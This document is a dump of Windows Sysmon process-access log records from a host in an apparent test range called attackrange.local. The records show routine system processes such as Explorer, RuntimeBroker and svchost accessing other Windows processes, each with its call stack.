13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+5bb0|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+5bb0|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.586{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.570{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.570{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.570{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+18a6c|C:\Windows\SYSTEM32\psmserviceexthost.dll+e44e|C:\Windows\SYSTEM32\psmserviceexthost.dll+e4e7|C:\Windows\SYSTEM32\psmserviceexthost.dll+e1f2|C:\Windows\SYSTEM32\psmserviceexthost.dll+18e38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.570{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.570{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.508{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.508{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.508{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.508{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.508{59A5CD1D-93F9-6005-F104-00000000A301}45405956C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2a2f8d|C:\Windows\System32\Windows.Storage.dll+f5a73|C:\Windows\System32\Windows.Storage.dll+f5aea|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.492{59A5CD1D-93F9-6005-F104-00000000A301}45405956C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2ca332|C:\Windows\System32\Windows.Storage.dll+5ed75|C:\Windows\System32\Windows.Storage.dll+f5356|C:\Windows\System32\Windows.Storage.dll+2a2eef|C:\Windows\System32\Windows.Storage.dll+f5a73|C:\Windows\System32\Windows.Storage.dll+f5aea|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506 10341000x800000000000000012167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.476{59A5CD1D-93F9-6005-F104-00000000A301}45405952C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+f98a|C:\Windows\System32\execmodelclient.dll+f830|C:\Windows\System32\execmodelclient.dll+1e079|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 